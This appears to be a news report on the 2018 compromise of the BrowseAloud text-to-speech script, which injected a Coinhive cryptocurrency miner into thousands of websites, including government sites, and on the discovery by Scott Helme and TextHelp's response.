Thousands of sites were injected with a in-browser Monero miner today after a popular accessibility script was compromised. With 4, 275 sites affected, this included government websites such as uscourts.gov, ico.org.uk, & manchester.gov.uk.
Thousands of sites were injected with a in-browser Monero miner today after a popular accessibility script was compromised. With 4,275 sites affected, this included government websites such as uscourts.gov, ico.org.uk, & manchester.gov.uk.
This was first noticed earlier this morning by infosec consultant Scott Helme when he saw that UK government site ico.org.uk was utilizing the the Coinhive in-browser mining (cryptojacking) script. This caused any visitors to the site to use their CPU to mine for the digital currency called Monero.
When Helme investigated further he saw that it wasn’t just this site that started injecting a Coinhive miner, but many other government sites from numerous countries such as uscourts.gov, gmc-uk.gov, nhsinform.scot, manchester.gov.uk, and many more.
— Scott Helme (@Scott_Helme) February 11, 2018
The one thing all of these sites had in common was that they utilized a popular text-to-speech accessibility script called BrowseAloud by TextHelp.com. When Helme examined the BrowseAloud script, he saw that this script contained obfuscated code that was injecting the Coinhive miner into all of these websites.
When decoded, this script injects the Coinhive cryptojacking script, runs it at 40% CPU utilization, and mines for the 1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq Coinhive account.
Knowing that it was a compromised BrowseAloud script that was injecting the miner, Helme was able to quickly track the script to 4,275 sites that were affected in the incident.
After alerting TextHelp.com about their compromised script, the CTO of TextHelp stated that the script was taken down and would not be enabled again until after an investigation took place.
BleepingComputer reached out to TextHelp for more information but had not heard back from them at the time of publishing this article. According to a recently published post by TextHelp, the company has stated that an attacker compromised the BrowseAloud script, but no other TextHelp services were affected.